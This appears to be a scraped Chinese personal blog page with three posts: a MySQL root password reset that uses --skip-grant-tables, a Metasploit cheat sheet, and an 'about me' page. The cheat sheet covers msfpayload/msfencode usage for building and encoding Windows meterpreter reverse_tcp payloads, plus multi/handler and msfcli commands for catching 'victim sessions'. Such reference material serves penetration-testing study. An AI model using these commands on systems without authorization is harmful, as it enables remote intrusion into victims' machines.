编程 几秒 读完 (约 88 字)

刚装完的mysql数据库出现了如下错误:
ERROR 1045 (28000): Access denied for user ‘root‘@’localhost’ (using password: NO)
参考了这篇博文:
http://www.cnblogs.com/khler/archive/2011/02/10/1950819.html
用下面的语句解决了问题 

1
2
3
4
5
6
7
8
/etc/init.d/mysql stop 
mysqld_safe --skip-grant-tables& 
mysql --user=root mysql 
mysql>update user set Password=PASSWORD('new-password'); 
mysql>flush privileges; 
mysql>exit; 
killall mysqld_safe& 
/etc/init.d/mysql start

安全技术 4 分钟 读完 (约 638 字)

封装攻击载荷

msfpayload:

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>

Summary:summary and optons of payload

C:C language

Perl:Perl

Ruby:Ruby

Raw:Raw,allows payload to be piped into msfencode and other tools

Js:JavaScript

eXe:windows executable

Dll:Dll

Vba:VBA

War:war package

example:

msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter

msfpayload windows/meterpreter/reverse_tcp O:show options

msfpayload [payload] X >xx.exe

攻击载荷编码

msfencode:

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as:哪种体系结构编码

-b <opt>  The list of characters to avoid: '\x00\xff':指定要避免的字符

-c <opt>  The number of times to encode the data:编码数据的次数

-d <opt>  Specify the directory in which to look for EXE templates:指定搜索exe模板的目录

-e <opt>  The encoder to use:使用的编码器

-h        Help banner:帮助标题

-i <opt>  Encode the contents of the supplied file path:为提供的文件内容编码

-k        Keep template working; run payload in new thread (use with -x):让模板继续工作;即让载荷在新线程中运行

-l        List available encoders:列出可用的编码器

-m <opt>  Specifies an additional module search path:制定一个额外的模板搜索路径

-n        Dump encoder information:输出编码器信息

-o <opt>  The output file:输出文件

-p <opt>  The platform to encode for:要编码的平台

-s <opt>  The maximum size of the encoded data:编码后的最大字节数

-t <opt>  The output format:输出格式 bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war

-v        Increase verbosity:增加冗长

-x <opt>  Specify an alternate executable template:指定一个备用的可执行文件模板

受害会话接收

1
2
3
4
5
6
7
8
9
10
11
msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST x.x.x.x LPORT xxxx

msf exploit(handler) > exploit

[*] Started reverse handler on x.x.x.x:xxxx

[*] Starting the payload handler...

也可以不打开msfconsole,用msfcli

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msfcli <exploit_name> <option=value> [mode]

Mode           Description

----           -----------

(A)dvanced     Show available advanced options for this module显示这个模块可用的高级选项

(AC)tions      Show available actions for this auxiliary module显示辅助模块的可用行为

(C)heck        Run the check routine of the selected module为所选模块检查运行历程

(E)xecute      Execute the selected module执行所选模块

(H)elp         You're looking at it baby!么么大

(I)DS Evasion  Show available ids evasion options for this module

(O)ptions      Show available options for this module

(P)ayloads     Show available payloads for this module

(S)ummary      Show information about this module

(T)argets      Show available targets for this exploit module

Examples:

msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E

msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=6555 E

生活 2 分钟 读完 (约 239 字)

guest@universe: ~$whoami && whereis who && find / home

0x00 关于我

很宅很宅的一枚宅男。爱好一切。

0x02 关于chorder.net

2012年3月12
搭建第一处个人站点chorder.xp3.biz,使用免费域名+免费空间
2013年
购买域名chorder.org,基于wordpress发布第一个博客站点。
2014年
chorder.org域名到期,没有继续维护
同时参与团队博客建设,维护chorder.wpsec.org
2015年初
申请域名chorder.net
并启用搬瓦工VPS,使用静态页面,定期POST文章
2015年中
使用github.io维护静态博客页面
2015年末
使用redhat公有云至今,并决定长期维护本站点。
2016年3月11日
重新迁回搬瓦工,启用https,证书颁发机构为StartCom Ltd.(https://www.startssl.com/)

0x03 在技术方面的座右铭
Talking is cheap,show me your code.

0x04 联系方式

Email: ruby -r 'base64' -e 'puts Base64.decode64("Y2hvcmRlckBjaG9yZGVyLm5ldA==")'

Powerd By Chorder
Since 2012

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×